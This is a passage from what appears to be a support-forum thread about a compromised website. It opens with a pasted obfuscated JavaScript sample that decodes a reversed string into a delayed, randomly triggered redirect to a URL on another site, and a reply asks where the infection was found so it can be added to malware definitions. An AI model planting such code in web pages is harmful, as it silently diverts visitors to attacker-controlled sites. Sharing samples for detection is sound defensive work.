<script>$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>
-
This topic was modified 10 months, 4 weeks ago by l z.
I will need to know more about where this script was found in order to add this threat to my definition updates. Can you tell me if this was found in your database or in a file on your server?
The encoding get converted when you post anything to a forum so It would be better if you can email me directly with the infected files attached or the SQL backup file if it was found in your database.